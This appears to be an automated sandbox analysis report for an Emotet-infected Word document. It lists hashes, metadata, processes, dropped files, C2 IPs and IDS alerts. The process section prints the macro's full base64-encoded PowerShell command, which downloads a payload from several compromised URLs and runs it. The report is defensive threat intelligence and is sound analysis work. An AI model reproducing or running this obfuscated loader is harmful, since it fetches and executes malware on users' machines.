analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

e7fe088857fc5b07b08c461363cfcfa9ce9ddf97.doc

Full analysis: https://app.any.run/tasks/4c372845-8c83-4c7e-9e33-6480ea1abf37
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 19, 2019, 09:19:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: seize mobile Handmade Fresh Chicken, Subject: generating, Author: Meagan Kuvalis, Comments: Kuwaiti Dinar, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 08:11:00 2019, Last Saved Time/Date: Thu Sep 19 08:11:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

16A064689918137707FC9E92671FA681

SHA1:

E7FE088857FC5B07B08C461363CFCFA9CE9DDF97

SHA256:

820C65C6EF01642AB6280B5CC80F98B24572841D5BCEC34769037BDE8B3D2CD0

SSDEEP:

6144:dxNVifQ2eqPobQZbrwIQOVPLkIq7NSU4jJntATfDQ3XvbbD:dxNVifQ2eqPobQZbrwIQOFXq7NSU4VeU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 71.exe (PID: 2304)
      • 71.exe (PID: 3448)
      • 71.exe (PID: 3548)
      • 71.exe (PID: 4040)
      • easywindow.exe (PID: 2376)
      • easywindow.exe (PID: 3348)
      • easywindow.exe (PID: 2308)
      • easywindow.exe (PID: 3504)
    • Emotet process was detected

      • 71.exe (PID: 2304)
    • EMOTET was detected

      • easywindow.exe (PID: 2308)
    • Connects to CnC server

      • easywindow.exe (PID: 2308)
    • Changes the autorun value in the registry

      • easywindow.exe (PID: 2308)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2608)
    • Executed via WMI

      • powershell.exe (PID: 2608)
    • PowerShell script executed

      • powershell.exe (PID: 2608)
    • Application launched itself

      • 71.exe (PID: 4040)
    • Starts itself from another location

      • 71.exe (PID: 2304)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2608)
      • 71.exe (PID: 2304)
    • Connects to server without host name

      • easywindow.exe (PID: 2308)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3468)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2608)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3468)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: seize mobile Handmade Fresh Chicken
Subject: generating
Author: Meagan Kuvalis
Keywords: -
Comments: Kuwaiti Dinar
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:19 07:11:00
ModifyDate: 2019:09:19 07:11:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Zulauf and Sons
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Kohler
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 71.exe no specs 71.exe no specs 71.exe no specs #EMOTET 71.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs #EMOTET easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
3468"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\e7fe088857fc5b07b08c461363cfcfa9ce9ddf97.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2608powershell -encod JABhAE0AUABjAFoAMwBqAD0AJwBZAFgAaAB3AE0AagAnADsAJABSAGkAUwBUADAAcAAgAD0AIAAnADcAMQAnADsAJABiAE0ATQA2AFAAbwA9ACcAdABiAHEAMwAyAFoARABrACcAOwAkAG4AVgBBADkAMgA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABSAGkAUwBUADAAcAArACcALgBlAHgAZQAnADsAJABsAEkAMQA0AHoAYQA2AD0AJwBmAFcASQBDAE8AUQB3ACcAOwAkAGwAdQBIAEMAbgBaAFMAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAGIAQwBsAEkAZQBOAHQAOwAkAHQARgBrADMARgBOAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB1AG4AaQB0AGUAZABtAGUAZABzAHMAaABvAHAALgBjAG8AbQAvAHgAeABqAHkAdwAvAEgAbgBGAFoASQBLAFIALwBAAGgAdAB0AHAAOgAvAC8AYwBlAG4AZwBpAHoAZwB1AGwAZQByAC4AYwBvAG0ALgB0AHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUgB2AHAASABiAHkAZQAvAEAAaAB0AHQAcABzADoALwAvAGsAZQB0AG8AcgBlAGMAaQBwAGUAcwBsAGMAaABmAC4AcwBpAHQAZQAvAHQAZQBzAHQALwByADQAaQBhAGQALQBiAG0AMABpADcAZgAtADcANwAwADcAOAA1AC8AQABoAHQAdABwAHMAOgAvAC8AYgBvAG4AZABiAGUAbgBnAGEAbABzAC4AaQBuAGYAbwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBpADYAMQAzADQALQA5AGYAMAAtADEANwA0ADcAMAAwADYAOAAvAEAAaAB0AHQAcABzADoALwAvAGIAaQBrAGUAbABvAHYAZQByAHMALgBiAGwAbwBnAC4AYgByAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ATQBnAHEARQBtAGIAQgBCAC8AJwAuACIAUwBgAFAAbABJAHQAIgAoACcAQAAnACkAOwAkAEkAbAA4AG0AdQBjAEEAPQAnAEoAbgAwAGQATABMAEcAVgAnADsAZgBvAHIAZQBhAGMAaAAoACQASQB6AEUAegA4AGgAbQAwACAAaQBuACAAJAB0AEYAawAzAEYATgApAHsAdAByAHkAewAkAGwAdQBIAEMAbgBaAFMALgAiAEQAYABPAGAAdwBuAEwATwBBAEQARgBgAGkATABlACIAKAAkAEkAegBFAHoAOABoAG0AMAAsACAAJABuAFYAQQA5ADIAOAApADsAJABoAFgAegBBADMARQBHAD0AJwBWAGIAbQBDAFIAZgBaAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABuAFYAQQA5ADIAOAApAC4AIgBMAGUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIAOQA0ADAANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJABuAFYAQQA5ADIAOAApADsAJABVADQAdgBmAHUAdgBsAD0AJwB6ADcANQBVAGQAZAAnADsAYgByAGUAYQBrADsAJABpAEUAaABuADMAUgBxAD0AJwBpAHIAMAB3AHYAbgBPACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAG8AbgBSAFIASABpADAAYQA9ACcAYwBSAGsAdwBTAEIAMgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4040"C:\Users\admin\71.exe" C:\Users\admin\71.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3448"C:\Users\admin\71.exe" C:\Users\admin\71.exe71.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3548--70766e04C:\Users\admin\71.exe71.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2304--70766e04C:\Users\admin\71.exe
71.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2376"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe71.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3348"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3504--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2308--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 776
Read events
1 283
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3468WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9C54.tmp.cvr
MD5:
SHA256:
3468WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:FE201A162627021161FBB99000E7FCB8
SHA256:F20649DFDA8080B4C662E06BDC487341B979E2AEAEF9684FFD68644B5997D198
3468WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6A55E1C.wmfwmf
MD5:E458F793BEEE0520FF909128D01D8041
SHA256:D87E83DBCCF423A31278411E076AF3584DF0EF9B2489520BEBCA1111485C3E2B
3468WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3969776.wmfwmf
MD5:FA6672C0B94AAB1B31B4C772E8BB7129
SHA256:881E7EB76A816E3688DC4BE7A54B15728B3335A113AFCC6D51FEB3EB1872B1B5
3468WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BF7E0EF2.wmfwmf
MD5:26C7CA8B451760DD9FFD6DF450471A8B
SHA256:4F3CB4BA402FCCC7BC8D5562A9C51241F35F351E4BB0F7B35644A8B5BBB9E2E3
3468WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D96C5F28.wmfwmf
MD5:16BA83E62E0E7E5C5FA54FA7EA6ED1B8
SHA256:D37C1CC61B0D46F30C02675CC2323A8F24E74F6B0710AB5640A95C953EA906AC
3468WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BAA03BD0.wmfwmf
MD5:1F2356DD404797E21E13CF0E6FA763FE
SHA256:4A1CB325CA037775B41026F24AF89969A9A64647699FEEF16CFF668331F0FFA4
3468WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85BC178F.wmfwmf
MD5:85946955E42EC475401C5977914B09E1
SHA256:3021F6617EB04A319A2BC0D2376F6F2398752C51B1940B556FE0C05CBC1E1020
3468WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B36968A.wmfwmf
MD5:08951CCA408C2AEE6D60A6140F1E2B60
SHA256:919766FC46657C1F22ECDE1B419C9E953B2588EAC71D2C5B83142EF037104134
3468WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:13495AE41E5FCE25D837CC54DB555788
SHA256:38EB6AB438E98D6F75142DB96B109AA1EE91F09213966BA3A1409F5EA5A88685
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
7
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2308
easywindow.exe
POST
152.168.220.188:80
http://152.168.220.188/cookies/
AR
malicious
2308
easywindow.exe
POST
78.109.34.178:443
http://78.109.34.178:443/acquire/xian/
RU
malicious
2308
easywindow.exe
POST
200
45.33.1.161:8080
http://45.33.1.161:8080/cookies/between/nsip/
US
binary
148 b
malicious
2308
easywindow.exe
POST
404
83.110.75.153:8090
http://83.110.75.153:8090/arizona/pnp/ringin/merge/
AE
html
548 b
malicious
2308
easywindow.exe
POST
404
70.45.30.28:80
http://70.45.30.28/usbccid/pdf/ringin/
PR
html
548 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2608
powershell.exe
104.28.27.31:443
www.unitedmedsshop.com
Cloudflare Inc
US
shared
2308
easywindow.exe
78.109.34.178:443
MTS PJSC
RU
malicious
2308
easywindow.exe
190.146.81.138:8090
Telmex Colombia S.A.
CO
malicious
2308
easywindow.exe
83.110.75.153:8090
Emirates Telecommunications Corporation
AE
malicious
2308
easywindow.exe
45.33.1.161:8080
Linode, LLC
US
malicious
2308
easywindow.exe
152.168.220.188:80
CABLEVISION S.A.
AR
malicious
2308
easywindow.exe
70.45.30.28:80
San Juan Cable, LLC
PR
malicious

DNS requests

Domain
IP
Reputation
www.unitedmedsshop.com
  • 104.28.27.31
  • 104.28.26.31
unknown
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
2308
easywindow.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
2308
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2308
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2308
easywindow.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
2308
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2308
easywindow.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 19
2308
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
13 ETPRO signatures available at the full report
No debug info